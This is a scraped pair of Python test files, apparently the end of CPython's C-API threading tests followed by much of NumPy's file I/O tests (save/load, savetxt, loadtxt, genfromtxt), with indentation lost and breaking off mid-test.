#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print "finished threads: ", nFinished
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
@unittest.skipUnless(threading and thread and 'TestThreadState' not in skips, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(thread.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
def test_main():
for name in dir(_testcapi):
if name.startswith('test_') and name not in skips:
test = getattr(_testcapi, name)
if support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise support.TestFailed, sys.exc_info()[1]
support.run_unittest(TestPendingCalls, TestThreadState)
if __name__ == "__main__":
test_main()
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
from tempfile import mkstemp, mktemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_, build_err_msg
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
tmp = mktemp(suffix='.npz')
a = np.empty(L, dtype=np.uint8)
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
os.remove(tmp)
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed) # must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overiden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def _assert_floatstr_lines_equal(actual_lines, expected_lines):
"""A string comparison function that also works on Windows + Python 2.5.
This is necessary because Python 2.5 on Windows inserts an extra 0 in
the exponent of the string representation of floating point numbers.
Only used in TestSaveTxt.test_complex_arrays, no attempt made to make this
more generic.
Once Python 2.5 compatibility is dropped, simply use `assert_equal` instead
of this function.
"""
for actual, expected in zip(actual_lines, expected_lines):
if actual != expected:
expected_win25 = expected.replace("e+00", "e+000")
if actual != expected_win25:
msg = build_err_msg([actual, expected], '', verbose=True)
raise AssertionError(msg)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]],[[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = { 'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = { 'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([ 72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
